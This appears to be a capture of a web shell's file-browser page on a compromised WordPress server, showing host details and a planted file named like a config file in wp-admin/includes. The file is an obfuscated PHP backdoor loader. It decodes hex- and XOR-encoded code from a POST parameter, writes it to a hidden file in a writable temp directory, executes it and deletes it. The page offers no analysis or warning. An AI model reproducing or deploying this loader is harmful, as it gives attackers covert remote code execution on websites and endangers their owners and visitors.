HEX
Server: Apache/2
System: Linux 17792.vpsvinahost.vn 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64
User: hitehp (1010)
PHP: 7.4.28
Disabled: NONE
Upload Files
File: /home/hitehp/domains/demo.namvietrfidvn.com/public_html/wp-admin/includes/config.1764134584.php
<!--21zsK8AW-->
<?php

if(!empty($_POST["ent"])){
$ent = hex2bin($_POST["ent"]);
$component      =    ''    ;     $v=0;while($v<strlen($ent)){$component.=chr(ord($ent[$v])^16);$v++;}
$entity = array_filter([getenv("TMP"), session_save_path(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TEMP")]);
foreach ($entity as $desc):
            if (array_product([is_dir($desc), is_writable($desc)])) {
            $ptr = join("/", [$desc, ".resource"]);
            if ($dat = fopen($ptr, 'w')) {
    fwrite($dat, $component);
    fclose($dat);
    include $ptr;
    unlink($ptr);
    die();
}
        }
endforeach;
}